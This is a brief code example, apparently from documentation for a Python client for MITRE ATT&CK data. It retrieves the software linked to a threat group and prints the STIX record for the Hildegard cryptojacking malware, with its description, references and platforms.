You can retrieve every software (malware or tool) mapped to a specific Group STIX object
groups = lift.get_groups()
one_group = groups[0]
group_software = lift.get_software_used_by_group(one_group)
group_software[0]
Malware(type='malware', id='malware--40a1b8ec-7295-416c-a6b1-68181d86f120', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2021-04-07T18:07:47.604Z', modified='2021-10-16T01:49:39.189Z', name='Hildegard', description='[Hildegard](https://attack.mitre.org/software/S0601) is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind [Hildegard](https://attack.mitre.org/software/S0601). (Citation: Unit 42 Hildegard Malware)', revoked=False, labels=['malware'], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/software/S0601', external_id='S0601'), ExternalReference(source_name='Unit 42 Hildegard Malware', description='Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.', url='https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_aliases=['Hildegard'], x_mitre_contributors=['Center for Threat-Informed Defense (CTID)'], x_mitre_platforms=['Linux', 'Containers', 'IaaS'], x_mitre_version='1.1')